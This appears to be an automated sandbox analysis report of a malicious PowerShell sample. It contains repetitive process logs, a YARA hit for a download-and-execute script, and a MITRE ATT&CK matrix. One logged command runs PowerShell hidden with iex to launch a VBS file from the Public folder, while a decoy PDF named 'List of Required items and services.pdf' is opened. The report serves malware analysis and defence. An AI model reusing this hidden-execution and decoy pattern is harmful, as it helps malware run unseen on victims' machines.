      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_7572.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7572, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting      		Valid Accounts1
      PowerShell      		1
      Scripting      		11
      Process Injection      		11
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote ServicesData from Local System1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder      		1
      Registry Run Keys / Startup Folder      		31
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      DLL Side-Loading      		1
      DLL Side-Loading      		11
      Process Injection      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture4
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
